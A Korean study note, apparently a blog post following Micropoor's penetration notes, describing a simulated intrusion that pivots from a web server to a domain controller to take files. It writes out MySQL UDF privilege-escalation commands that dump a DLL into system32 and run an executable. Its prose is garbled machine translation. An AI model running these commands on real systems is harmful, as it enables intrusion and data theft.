micropoor 선배 님 의 침투 노트 따라 가기 (3)

이 노트 의 원 서 는 Micropoor 선배 의 Micro 8 에서 유래 한 것 이다. 여기 서 나 는 내 가 관심 이 있 는 곳 에 만 자신의 학습 노트 를 하고 처음에 몇 시간 에서 왔 는 지 밝 힐 것 이다.다음은 8 교시 부터 선생님 께 서 잘 쓰 셨 기 때문에 여 기 는 사고 와 다른 소개 만 하 겠 습 니 다.
아 날로 그 요구 공격 상황 소개
사건 과정: 이 회사 의 내년 계획 을 받 아 이 회사 의 올해 보고 서 를 받 고 이 회사 의 조직 구 조 를 파악 한다.이윤 상황.사고: 대상 홈 페이지 (win 08 R2) 셸 을 받 아 정 보 를 수집 한 다음 에 두 번 째 서버 를 내 려 놓 고 정 보 를 수집 하고 루트, msf 제 권 을 읽 으 며 도 메 인 제어 와 크로스 서버 권한 을 얻 은 후에 개인 호스트 로 건 너 가 파일 을 가 져 옵 니 다.
사고의 방향
호스트 정보, 포트, 작업 목록 (tasklist, 중점 민감 한 작업 주의), 계 정 수집, 중요 한 경로 수집 (미래 를 위해 dump file 준비 가 필요 할 수 있 습 니 다), 데이터 베이스 등 암호 수집 (미래 를 위해 충돌 준비 가 필요 할 수 있 습 니 다), 소프트 수집, 관리자 습관 등
두 번 째 서버 를 받 은 후 정 보 를 수집 한 결과 my sql 서비스 가 있 습 니 다. 루트 정보 my sql 의 root hash: MySQL\MySQL Server 5.0\\data\\my sql\user. MYD 를 읽 고 셸 에 기록 한 다음 에 상호작용 하 는 셸 에서 my sql - urot - pxxx 를 실행 하면 상호작용 을 계속 할 수 없습니다. 매개 변수 e 가 이 문 제 를 해결 해 야 합 니 다.

mysql -uroot -pxxxxxxxx mysql -e "create table a (cmd LONGBLOB);" 
mysql -uroot -pxxxxxxxx mysql -e "insert into a (cmd) values (hex(load_file('C:\\xxxx\\xxxx.dll')));"
            hex        。
mysql -uroot -pxxxxxxxx mysql -e "SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\xxxx.dll';" mysql -uroot -pxxxxxxxx mysql -e "CREATE FUNCTION shell RETURNS STRING SONAME 'udf.dll'" 
mysql -uroot -pxxxxxxxx mysql -e "select shell('cmd','C:\\xxxx\\xxx\\xxxxx.exe');"

msf 를 이용 하여 명령, 퍼 가기 등 을 수행 하고 도 메 인 제어 권한 을 받 은 후 크로스 서버 권한 을 받 아 인간 기기 에 전 화 를 걸 어 파일 을 가 져 옵 니 다.